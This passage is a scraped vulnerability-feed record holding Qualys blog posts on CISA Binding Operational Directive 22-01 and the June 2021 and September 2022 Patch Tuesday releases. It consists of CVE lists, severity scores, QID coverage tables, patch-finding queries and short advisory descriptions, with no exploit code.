2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732','CVE-2020-1350','CVE-2020-1472','CVE-2021-26855','CVE-2021-26858','CVE-2021-27065','CVE-2020-0601','CVE-2021-26857','CVE-2021-22893','CVE-2020-8243','CVE-2021-22900','CVE-2021-22894','CVE-2020-8260','CVE-2021-22899','CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical part of threat mitigation, but only a part. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", 
"CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-06-15T08:32:22", "description": "### Microsoft Patch Tuesday \u2013 June 2021\n\nMicrosoft patched 50 CVEs in their June 2021 Patch Tuesday release, and five of them are rated as critical severity. 
Six have applicable exploits.\n\n#### Critical Microsoft Vulnerabilities Patched\n\n[CVE-2021-31985](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31985>) \u2013 Microsoft Defender Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE vulnerability in its Defender product (CVE-2021-31985). This CVE has a high likelihood of exploitability and is assigned a CVSSv3 base score of 7.8 by the vendor.\n\n[CVE-2021-31959](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31959>) \u2013 Scripting Engine Memory Corruption Vulnerability\n\nMicrosoft released patches addressing a critical memory corruption vulnerability in the Chakra JScript scripting engine. This vulnerability impacts Windows RT, Windows 7, Windows 8, Windows 10, Windows Server 2008 R2, Windows Server 2012 (R2) and Windows Server 2016. An adversary can exploit this vulnerability when the target user opens a specially crafted file.\n\n[CVE-2021-31963](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31963>) \u2013 Microsoft SharePoint Server Remote Code Execution Vulnerability\n\nMicrosoft released patches addressing a critical RCE in SharePoint Server. 
This CVE is assigned a CVSSv3 base score of 7.1 by the vendor.\n\n#### Six 0-Day Vulnerabilities with Exploits in the Wild Patched\n\nThe following vulnerabilities need immediate attention for patching since they have active exploits in the wild:\n\n[CVE-2021-33742](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33742>) \u2013 Windows MSHTML Platform Remote Code Execution Vulnerability \n[CVE-2021-33739](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-33739>) \u2013 Microsoft DWM Core Library Elevation of Privilege Vulnerability \n[CVE-2021-31956](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31956>) \u2013 Windows NTFS Elevation of Privilege Vulnerability \n[CVE-2021-31955](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31955>) \u2013 Windows Kernel Information Disclosure Vulnerability \n[CVE-2021-31201](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31201>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability \n[CVE-2021-31199](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-31199>) \u2013 Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability\n\n#### **Qualys QIDs Providing Coverage**\n\nQID| Title| Severity| CVE ID \n---|---|---|--- \n91768| Microsoft .NET Core Security Update June 2021| Medium| CVE-2021-31957 \n91769| Microsoft Visual Studio Security Update for June 2021| Medium| CVE-2021-31957 \n375614| Visual Studio Code Kubernetes Tools Extension Elevation of Privilege Vulnerability| Medium| CVE-2021-31938 \n110383| Microsoft SharePoint Enterprise Server Multiple Vulnerabilities June 2021| High| CVE-2021-31966,CVE-2021-31965,CVE-2021-31964,CVE-2021-31963,CVE-2021-31950,CVE-2021-31948,CVE-2021-26420 \n110384| Microsoft Office and Microsoft Office Services and Web Apps Security Update June 2021| High| CVE-2021-31939,CVE-2021-31941,CVE-2021-31940,CVE-2021-31949 \n110385| Microsoft Outlook Remote Code 
Execution Vulnerability Security Update June 2021| High| CVE-2021-31949,CVE-2021-31941 \n91771| Microsoft Defender Multiple Vulnerabilities - June 2021| Critical| CVE-2021-31978,CVE-2021-31985 \n91772| Microsoft Windows Security Update for June 2021| Critical| CVE-2021-1675,CVE-2021-26414,CVE-2021-31199,CVE-2021-31201,CVE-2021-31951,CVE-2021-31952,CVE-2021-31953,CVE-2021-31954,CVE-2021-31955,CVE-2021-31956,CVE-2021-31958,CVE-2021-31959,CVE-2021-31960,CVE-2021-31962,CVE-2021-31968,CVE-2021-31969,CVE-2021-31970,CVE-2021-31971,CVE-2021-31972,CVE-2021-31973,CVE-2021-31974,CVE-2021-31975,CVE-2021-31976,CVE-2021-31977,CVE-2021-33742 \n91773| Microsoft 3D Viewer Multiple Vulnerabilities - June 2021| High| CVE-2021-31944,CVE-2021-31943,CVE-2021-31942 \n91774| Microsoft Paint 3D Remote Code Execution Vulnerability| High| CVE-2021-31983,CVE-2021-31946,CVE-2021-31945 \n91775| Microsoft Windows VP9 Video Extension Remote Code Execution Vulnerability| Medium| CVE-2021-31967 \n91777| Microsoft Windows DWM Core Library Elevation of Privilege Vulnerability - June 2021 | High| CVE-2021-33739 \n \n### Adobe Patch Tuesday \u2013 June 2021\n\nAdobe addressed 41 CVEs this Patch Tuesday, and 21 of them are rated as critical severity impacting Acrobat and Reader, Adobe Photoshop, Creative Cloud Desktop Application, RoboHelp Server, Adobe After Effects, and Adobe Animate products.\n\nAdobe Security Bulletin| QID| Severity| CVE ID \n---|---|---|--- \nAdobe Animate Multiple Security Vulnerabilities (APSB21-50)| 91770| Medium| CVE-2021-28630,CVE-2021-28619,CVE-2021-28617,CVE-2021-28618,CVE-2021-28621,CVE-2021-28620,CVE-2021-28629,CVE-2021-28622 \nAdobe Security Update for Adobe Acrobat and Reader( APSB21-37)| 375611| High| CVE-2021-28551,CVE-2021-28554,CVE-2021-28552,CVE-2021-28631,CVE-2021-28632 \n \n### Discover Patch Tuesday Vulnerabilities in VMDR\n\nQualys VMDR automatically detects new Patch Tuesday vulnerabilities using continuous updates to its Knowledge Base (KB).\n\nYou can see all 
your impacted hosts by these vulnerabilities using the following QQL query:\n\n`vulnerabilities.vulnerability:(qid:`91768` OR qid:`91769` OR qid:`91770` OR qid:`91771` OR qid:`91772` OR qid:`91773` OR qid:`91774` OR qid:`91775` OR qid:`91777` OR qid:`110383` OR qid:`110384` OR qid:`110385` OR qid:`375611` OR qid:`375614`)`\n\n\n\n### Respond by Patching\n\nVMDR rapidly remediates Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select respective QIDs in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go.\n\nThe following QQL will return the missing patches pertaining to this Patch Tuesday.\n\n`(qid:`91768` OR qid:`91769` OR qid:`91770` OR qid:`91771` OR qid:`91772` OR qid:`91773` OR qid:`91774` OR qid:`91775` OR qid:`91777` OR qid:`110383` OR qid:`110384` OR qid:`110385` OR qid:`375611` OR qid:`375614`)`\n\n\n\n### Patch Tuesday Dashboard\n\nThe current updated Patch Tuesday dashboards are available in [Dashboard Toolbox: 2021 Patch Tuesday Dashboard](<https://qualys-secure.force.com/discussions/s/article/000006505>).\n\n### Webinar Series: This Month in Patches\n\nTo help customers leverage the seamless integration between Qualys VMDR and Patch Management and reduce the median time to remediate critical vulnerabilities, the Qualys Research team is hosting a monthly webinar series [_This Month in Patches_](<https://www.brighttalk.com/webcast/11673/491681>).\n\nWe discuss some of the key vulnerabilities disclosed in the past month and how to patch them:\n\n * VMware vCenter Server Multiple Vulnerabilities\n * Ubuntu XStream Vulnerabilities\n * Microsoft Patch Tuesday, June 2021\n\n[Join us live or watch on demand](<https://www.brighttalk.com/webcast/11673/491681>)!\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening 
of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-06-08T21:19:29", "type": "qualysblog", "title": "Microsoft & Adobe Patch Tuesday (June 2021) \u2013 Microsoft 50 Vulnerabilities with 5 Critical, Adobe 21 Critical Vulnerabilities", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-1675", "CVE-2021-26414", "CVE-2021-26420", "CVE-2021-28551", "CVE-2021-28552", "CVE-2021-28554", "CVE-2021-28617", "CVE-2021-28618", "CVE-2021-28619", "CVE-2021-28620", "CVE-2021-28621", "CVE-2021-28622", "CVE-2021-28629", "CVE-2021-28630", "CVE-2021-28631", "CVE-2021-28632", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31938", "CVE-2021-31939", "CVE-2021-31940", "CVE-2021-31941", "CVE-2021-31942", "CVE-2021-31943", "CVE-2021-31944", "CVE-2021-31945", "CVE-2021-31946", "CVE-2021-31948", "CVE-2021-31949", "CVE-2021-31950", "CVE-2021-31951", "CVE-2021-31952", "CVE-2021-31953", "CVE-2021-31954", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31957", "CVE-2021-31958", "CVE-2021-31959", "CVE-2021-31960", "CVE-2021-31962", "CVE-2021-31963", "CVE-2021-31964", "CVE-2021-31965", "CVE-2021-31966", "CVE-2021-31967", "CVE-2021-31968", "CVE-2021-31969", "CVE-2021-31970", "CVE-2021-31971", "CVE-2021-31972", "CVE-2021-31973", "CVE-2021-31974", "CVE-2021-31975", "CVE-2021-31976", "CVE-2021-31977", "CVE-2021-31978", "CVE-2021-31983", "CVE-2021-31985", "CVE-2021-33739", "CVE-2021-33742"], "modified": "2021-06-08T21:19:29", "id": "QUALYSBLOG:23EF75126B24C22C999DAD4D7A2E9DF5", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-03T20:04:30", "description": "# **Microsoft Patch Tuesday Summary**\n\nMicrosoft has fixed 63 vulnerabilities (aka flaws) in the September 2022 update, including five (5) vulnerabilities classified as 
**_Critical_** as they allow Remote Code Execution (RCE). This month's Patch Tuesday fixes two (2) zero-day vulnerabilities, one (1) of which, **[CVE-2022-37969](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969>)**, is actively exploited in attacks (the other being **[CVE-2022-23960](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23960>)**). Earlier this month, on September 1-2, 2022, Microsoft also released a total of 16 Microsoft Edge (Chromium-Based) updates, one (1) addressing a Remote Code Execution (RCE) ([CVE-2022-38012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>)) ranked _**Low**_.\n\nThe flaws Microsoft fixed fall into several categories, including Denial of Service, Elevation of Privilege, Information Disclosure, Microsoft Edge (Chromium-based), Remote Code Execution, and Security Feature Bypass.\n\n## **The September 2022 Microsoft Vulnerabilities are Classified as follows:**\n\n\n\n# **Notable Microsoft Vulnerabilities Patched**\n\n### [CVE-2022-34718](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34718>) | Windows TCP/IP Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn unauthenticated attacker could send a specially crafted IPv6 packet to a Windows node where IPSec is enabled, which could enable remote code execution on that machine.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [CVE-2022-34721](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34721>), [CVE-2022-34722](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34722>) | Windows Internet Key Exchange (IKE) Protocol 
Extensions Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 9.8/10.\n\nAn unauthenticated attacker could send a specially crafted IP packet to a target machine that is running Windows and has IPSec enabled, which could enable a remote code execution exploitation. NOTE: This vulnerability_ only impacts IKEv1_. IKEv2 is not impacted. However, all Windows Servers are affected because they accept both V1 and V2 packets.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n# **Zero-Day Vulnerabilities Addressed**\n\nA vulnerability is classified as a zero-day if it is publicly disclosed or actively exploited with no official fix available.\n\n### [CVE-2022-37969](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-37969>) | Windows Common Log File System Driver Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nAn attacker must already have access and the ability to run code on the target system. This technique does not allow for remote code execution in cases where the attacker does not already have that ability on the target system.\n\nAn attacker who successfully exploited this vulnerability could gain SYSTEM privileges.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation More Likely_**\n\n* * *\n\n### [CVE-2022-23960](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-23960>) | Windows Common Log File System Driver Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of [5.6](<https://nvd.nist.gov/vuln/detail/CVE-2022-23960>)/10.\n\n[CVE-2022-23960](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23960>) is regarding a vulnerability known as Spectre-BHB. 
MITRE created this CVE on behalf of Arm Limited.\n\nPlease see [Spectre-BHB on arm Developer](<https://developer.arm.com/Arm%20Security%20Center/Spectre-BHB>) for more information.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): _**Exploitation Less Likely**_\n\n* * *\n\n# **Microsoft Important Vulnerability Highlights**\n\nThis month\u2019s [advisory](<https://msrc.microsoft.com/update-guide/releaseNote/2022-Sep>) covers multiple Microsoft product families, including Azure, Browser, Developer Tools, [Extended Security Updates (ESU)](<https://docs.microsoft.com/en-us/lifecycle/faq/extended-security-updates>), Microsoft Dynamics, Microsoft Office, System Center, and Windows.\n\nA total of 92 unique Microsoft products/versions are affected, including but not limited to .NET, Azure Arc, Microsoft Dynamics, Microsoft Edge (Chromium-based), Microsoft Office, Microsoft Office SharePoint, SPNEGO Extended Negotiation, Visual Studio Code, Windows Common Log File System Driver, Windows Credential Roaming Service, Windows Defender, Windows Distributed File System (DFS), Windows DPAPI (Data Protection Application Programming Interface), Windows Enterprise App Management, Windows Event Tracing, Windows Group Policy, Windows IKE Extension, Windows Kerberos, Windows Kernel, Windows LDAP - Lightweight Directory Access Protocol, Windows ODBC Driver, Windows OLE, Windows Print Spooler Components, Windows Remote Access Connection Manager, Windows TCP/IP, and Windows Transport Security Layer (TLS).\n\nDownloads include Cumulative Update, Monthly Rollup, Security Hotpatch Update, Security Only, and Security Updates.\n\n* * *\n\n### [CVE-2022-38009](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38009>) | Microsoft SharePoint Server Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 8.8/10.\n\nIn a network-based attack, an authenticated attacker with Manage List permissions could 
execute code remotely on the SharePoint Server.\n\nThe attacker must be authenticated to the target site, with the permission to use Manage Lists within SharePoint.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-26929](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26929>) | .NET Framework Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nThe word **Remote** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). The attack itself is carried out locally.\n\nFor example, when the score indicates that the **Attack Vector** is **Local** and **User Interaction** is **Required**, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-22047>)[CVE-2022-38007](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38007>) | Azure Guest Configuration and Azure Arc-enabled Servers Elevation of Privilege (EoP) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.8/10.\n\nAn attacker who successfully exploited the vulnerability could replace Microsoft-shipped code with their own code, which would then be run as root in the context of a Guest Configuration daemon. On an Azure VM with the Guest Configuration Linux Extension installed, this would run in the context of the GC Policy Agent daemon. 
On an Azure Arc-enabled server, it could run in the context of the GC Arc Service or Extension Service daemons.\n\n[Exploitability Assessment](<https://www.microsoft.com/en-us/msrc/exploitability-index?rtc=1>): **_Exploitation Less Likely_**\n\n* * *\n\n## **Microsoft Edge | Last But Not Least**\n\nEarlier in September 2022, Microsoft released Microsoft Edge (Chromium-based) vulnerabilities including [CVE-2022-38012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>). The vulnerability assigned to the CVE is in the Chromium Open Source Software (OSS) which is consumed by Microsoft Edge. It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. For more information, please see [Security Update Guide Supports CVEs Assigned by Industry Partners](<https://msrc-blog.microsoft.com/2021/01/13/security-update-guide-supports-cves-assigned-by-industry-partners/>).\n\n### [](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>)[CVE-2022-38012](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-38012>) | Microsoft Edge (Chromium-based) Remote Code Execution (RCE) Vulnerability\n\nThis vulnerability has a CVSSv3.1 score of 7.7/10.\n\nThe word **Remote** in the title refers to the location of the attacker. This type of exploit is sometimes referred to as Arbitrary Code Execution (ACE). 
The attack itself is carried out locally.\n\nFor example, when the score indicates that the **Attack Vector** is **Local** and **User Interaction** is **Required**, this could describe an exploit in which an attacker, through social engineering, convinces a victim to download and open a specially crafted file from a website which leads to a local attack on their computer.\n\nThis vulnerability could lead to a browser sandbox escape.\n\nSuccessful exploitation of this vulnerability requires an attacker to take additional actions prior to exploitation to prepare the target environment.\n\nNOTE: [Per Microsoft's severity guidelines](<https://www.microsoft.com/en-us/msrc/bounty-new-edge>), the amount of user interaction or preconditions required to allow this sort of exploitation downgraded the severity. The CVSS scoring system doesn't allow for this type of nuance which explains why this CVE is rated as Low, but the CVSSv3.1 score is 7.7\n\n* * *\n\n# **Adobe Security Bulletins and Advisories**\n\nAdobe released seven (7) [security bulletins and advisories](<https://helpx.adobe.com/security/security-bulletin.html>) with updates to fix 63 vulnerabilities affecting Adobe Animate, Bridge, Illustrator, InCopy, InDesign, Photoshop, and Experience Manager applications. 
Of these 63 vulnerabilities, 35 are rated as **_[Critical](<https://helpx.adobe.com/security/severity-ratings.html>)_** and 28 rated as **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**, with CVSS scores ranging from 5.3/10 to 7.8/10, as summarized below.\n\n\n\n* * *\n\n### [APSB22-40](<https://helpx.adobe.com/security/products/experience-manager/apsb22-40.html>) | Security Update Available for Adobe Experience Manager\n\nThis update resolves 11 **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_** vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released updates for Adobe Experience Manager (AEM). These updates resolve vulnerabilities rated [Important](<https://helpx.adobe.com/security/severity-ratings.html>). Successful exploitation of these vulnerabilities could result in arbitrary code execution and security feature bypass.\n\n* * *\n\n### [APSB22-49](<https://helpx.adobe.com/security/products/bridge/apsb22-49.html>) | Security Update Available for Adobe Bridge\n\nThis update resolves 12 vulnerabilities:\n\n * Ten (10) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe Bridge. 
This update addresses [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-50](<https://helpx.adobe.com/security/products/indesign/apsb22-50.html>) | Security Update Available for Adobe InDesign\n\nThis update resolves 18 vulnerabilities:\n\n * Eight (8) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Ten (10) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): _3\n\nAdobe has released a security update for Adobe InDesign. This update addresses multiple [critical ](<https://helpx.adobe.com/security/severity-ratings.html>)and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution, arbitrary file system read, and memory leak.\n\n* * *\n\n### [APSB22-52](<https://helpx.adobe.com/security/products/photoshop/apsb22-52.html>) | Security Update Available for Adobe Photoshop\n\nThis update resolves ten (10) vulnerabilities:\n\n * Nine (9) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * One (1) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Photoshop for Windows and macOS. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. 
Successful exploitation could lead to arbitrary code execution and memory leak.\n\n* * *\n\n### [APSB22-53](<https://helpx.adobe.com/security/products/incopy/apsb22-53.html>) | Security Update Available for Adobe InCopy\n\nThis update resolves seven (7) vulnerabilities:\n\n * Five (5) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released a security update for Adobe InCopy. This update addresses multiple [critical](<https://helpx.adobe.com/security/severity-ratings.html>) and [important](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution and memory leak. \n\n* * *\n\n### [APSB22-54](<https://helpx.adobe.com/security/products/animate/apsb22-54.html>) | Security Update Available for Adobe Animate\n\nThis update resolves two (2) [](<https://helpx.adobe.com/security/severity-ratings.html>)[_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities.\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Animate. This update resolves [critical](<https://helpx.adobe.com/security/severity-ratings.html>) vulnerabilities. Successful exploitation could lead to arbitrary code execution in the context of the current user. 
\n\n* * *\n\n### [APSB22-55](<https://helpx.adobe.com/security/products/illustrator/apsb22-55.html>) | Security Update Available for Adobe Illustrator\n\nThis update resolves three (3) vulnerabilities:\n\n * One (1) [_**Critical**_](<https://helpx.adobe.com/security/severity-ratings.html>)\n * Two (2) **_[Important](<https://helpx.adobe.com/security/severity-ratings.html>)_**\n\n_[Adobe Priority](<https://helpx.adobe.com/security/severity-ratings.html>): 3_\n\nAdobe has released an update for Adobe Illustrator 2022. This update resolves [critical ](<https://helpx.adobe.com/security/severity-ratings.html>)and [important ](<https://helpx.adobe.com/security/severity-ratings.html>)vulnerabilities that could lead to arbitrary code execution and memory leak.\n\n* * *\n\n# **About Qualys Patch Tuesday**\n\nQualys Patch Tuesday QIDs are published as [Security Alerts](<https://www.qualys.com/research/security-alerts/>) typically late in the evening on the day of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed later by the publication of the monthly queries for the [Unified Dashboard: 2022 Patch Tuesday (QID Based) Dashboard](<https://success.qualys.com/discussions/s/article/000006821>) by Noon on Wednesday.\n\n* * *\n\n## Qualys [Threat Protection](<https://www.qualys.com/apps/threat-protection/>) High-Rated 